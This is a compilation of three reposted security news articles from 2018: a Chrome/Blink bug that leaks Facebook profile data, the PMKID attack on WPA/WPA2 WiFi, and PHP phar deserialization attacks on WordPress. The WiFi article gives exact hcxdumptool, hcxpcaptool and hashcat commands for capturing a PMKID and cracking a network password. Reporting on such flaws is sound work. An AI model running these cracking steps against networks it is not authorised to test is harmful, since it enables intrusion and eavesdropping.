(BEING CONTINUED FROM 8/04/17)
A)Chrome Bug Allowed Hackers to Find Out Everything Facebook Knows About You
With the release of Chrome 68, Google prominently marks all non-HTTPS websites as ‘Not Secure’ on its browser to make the web a more secure place for Internet users.
If you haven’t yet, there is another significant reason to immediately switch to the latest version of the Chrome web browser.
Ron Masas, a security researcher from Imperva, has discovered a vulnerability in web browsers that could allow attackers to find everything other web platforms, like Facebook and Google, knows about you—and all they need is just trick you into visiting a website.
The vulnerability, identified as CVE-2018-6177, takes advantage of a weakness in audio/video HTML tags and affects all web browsers powered by “Blink Engine,” including Google Chrome.
To illustrate the attack scenario, the researcher took an example of Facebook, a popular social media platform that collects in-depth profiling information on its users, including their age, gender, where you have been (location data) and interests, i.e., what you like and what you don’t.
You must be aware of Facebook offering post targeting feature to page administrators, allowing them to define a targeted or restricted audience for specific posts based on their age, location, gender, and interest.
How the Browser Attack Works?
To demonstrate the vulnerability, the researcher created multiple Facebook posts with different combinations of the restricted audiences to categorize victims according to their age, location, interest or gender.
Now, if a website embeds all these Facebook posts on a web page, it will load and display only a few specific posts at the visitors’ end based on individuals’ profile data on Facebook that matches restricted audience settings.
For example, if a post—defined to be visible only to the Facebook users with age 26, male, having interest in hacking or Information Security—was loaded successfully, an attacker can potentially learn personal information on visitors, regardless of their privacy settings.
Though the idea sounds exciting and quite simple, there are no direct ways available for site administrators to determine whether an embedded post was loaded successfully for a specific visitor or not.
Thanks to Cross-Origin Resource Sharing (CORS)—a browser security mechanism that prevents a website from reading the content of other sites without their explicit permission.
However, Imperva researcher found that since audio and video HTML tags don’t validate the content type of fetched resources or reject responses with invalid MIME types, an attacker can use multiple hidden video or audio tags on a website to request Facebook posts.
“With several scripts running at once — each testing a different and unique restriction — the bad actor can relatively quickly mine a good amount of private data about the user,” Masses said.
“I found that by engineering sites to return a different response size depending on the currently logged user properties it is possible to use this method to extract valuable information.”
A member from Google security team also pointed that the vulnerability could also work against websites using APIs to fetch user session specific information.
The core of this vulnerability has some similarities with another browser bug, patched in June this year, which exploited a weakness in how web browsers handle cross-origin requests to video and audio files, allowing attackers to read the content of your Gmail or private Facebook messages.
Imperva researcher reported the vulnerability to Google with a proof of concept exploit, and the Chrome team patched the issue in Chrome 68 release.
So, Chrome users are strongly recommended to update their browser to the latest version, if they haven’t yet.
B)How to Hack WiFi Password Easily Using New Attack On WPA/WPA2
Looking for how to hack WiFi password OR WiFi hacking software?
Well, a security researcher has revealed a new WiFi hacking technique that makes it easier for hackers to crack WiFi passwords of most modern routers.
Discovered by the lead developer of the popular password-cracking tool Hashcat, Jens ‘Atom’ Steube, the new WiFi hack works explicitly against WPA/WPA2 wireless network protocols with Pairwise Master Key Identifier (PMKID)-based roaming features enabled.
The attack to compromise the WPA/WPA2 enabled WiFi networks was accidentally discovered by Steube while he was analyzing the newly-launched WPA3 security standard.
This new WiFi hacking method could potentially allow attackers to recover the Pre-shared Key (PSK) login passwords, allowing them to hack into your Wi-Fi network and eavesdrop on the Internet communications.
How to Hack WiFi Password Using PMKID
According to the researcher, the previously known WiFi hacking methods require attackers to wait for someone to log into a network and capture a full 4-way authentication handshake of EAPOL, which is a network port authentication protocol.
Whereas, the new attack no longer requires another user to be on the target network to capture credentials. Instead, it is performed on the RSN IE (Robust Security Network Information Element) using a single EAPOL (Extensible Authentication Protocol over LAN) frame after requesting it from the access point.
Robust Security Network is a protocol for establishing secure communications over an 802.11 wireless network and has PMKID, the key needed to establish a connection between a client and an access point, as one of its capabilities.
Step 1 — An attacker can use a tool, like hcxdumptool (v4.2.0 or higher), to request the PMKID from the targeted access point and dump the received frame to a file.
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status
Step 2 — Using the hcxpcaptool tool, the output (in pcapng format) of the frame can then be converted into a hash format accepted by Hashcat.
$ ./hcxpcaptool -z test.16800 test.pcapng
Step 3 — Use Hashcat (v4.2.0 or higher) password cracking tool to obtain the WPA PSK (Pre-Shared Key) password, and Bingo!
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’
That’s the password of the target wireless network, cracking which may take time depending on its length and complexity.
“At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers),” Steube said.
Since the new WiFi hack only works against networks with roaming functions enabled and requires attackers to brute force the password, users are recommended to protect their WiFi network with a secure password that’s difficult to crack.
This WiFi hack also does not work against next-generation wireless security protocol WPA3, since the new protocol is “much harder to attack because of its modern key establishment protocol called “Simultaneous Authentication of Equals” (SAE).”
C)New PHP Code Execution Attack Puts WordPress Sites at Risk
Sam Thomas, a security researcher from Secarma, has discovered a new exploitation technique that could make it easier for hackers to trigger critical deserialization vulnerabilities in PHP programming language using previously low-risk considered functions.
The new technique leaves hundreds of thousands of web applications open to remote code execution attacks, including websites powered by some popular content management systems like WordPress and Typo3.
PHP unserialization or object injection vulnerabilities were initially documented in 2009, which could allow an attacker to perform different kinds of attacks by supplying malicious inputs to the unserialize() PHP function.
If you are unaware, serialization is the process of converting data objects into a plain string, and unserialize function help program recreate an object back from a string.
Thomas found that an attacker can use low-risk functions against Phar archives to trigger deserialization attack without requiring the use of unserialize() function in a wide range of scenarios.
Phar files, an archive format in PHP, stores metadata in a serialized format, which gets unserialized whenever a file operation function (fopen, file_exists, file_get_contents, etc.) tries to access the archive file.
“This is true for both direct file operations (such as “file_exists”) and indirect operations such as those that occur during external entity processing within XML (i.e., when an XXE vulnerability is being exploited),” Thomas said.
Exploiting PHP Deserialization Attack Against WordPress Sites
In a detailed paper released at Black Hat conference last week, Thomas demonstrated how this attack can be executed against WordPress sites using an author account to take full control over the web server.
For successful exploitation of the flaw, all an attacker needs to do is upload a valid Phar archive containing the malicious payload object onto the target’s local file system and make the file operation function access it using the “phar://” stream wrapper.
Thomas also revealed that an attacker can even exploit this vulnerability using a JPEG image, originally a Phar archive converted into valid JPEG by modifying its first 100 bytes.
“The way certain thumbnail functionality within the application [WordPress] works enables an attacker with the privileges to upload and modify media items to gain sufficient control of the parameter used in a “file_exists” call to cause unserialization to occur,” the researcher said.
Once the crafted thumbnail uploaded on the targeted WordPress server, the attacker can use another function to call the same image file as a Phar archive using the “phar://” stream wrapper, eventually executing the arbitrary code when the program deserializes the metadata.
“The vulnerability exists due to insecure deserialization of data passed as an image file and then executed via the ‘phar://’ stream wrapper within the ‘wp_get_attachment_thumb_file’ function in ‘/wpincludes/post.php’ script,” an advisory reads.
“A remote authenticated attacker with the ability to create/edit posts can upload a malicious image and execute arbitrary PHP code on vulnerable system.”
Thomas reported this vulnerability to the WordPress security team earlier last year, and the company acknowledged the issue. However, the patch released by the company did not address the problem completely.
Thomas also reported the vulnerability to Typo3 on 9th June 2018, and the vendor addressed the issue in versions 7.6.30, 8.7.17 and 9.3.
For more details about the vulnerability, you can head on to the detailed paper [PDF] published by Secarma.
(TO BE CONTINUED)
SOURCE http://thehackernews.com 08/18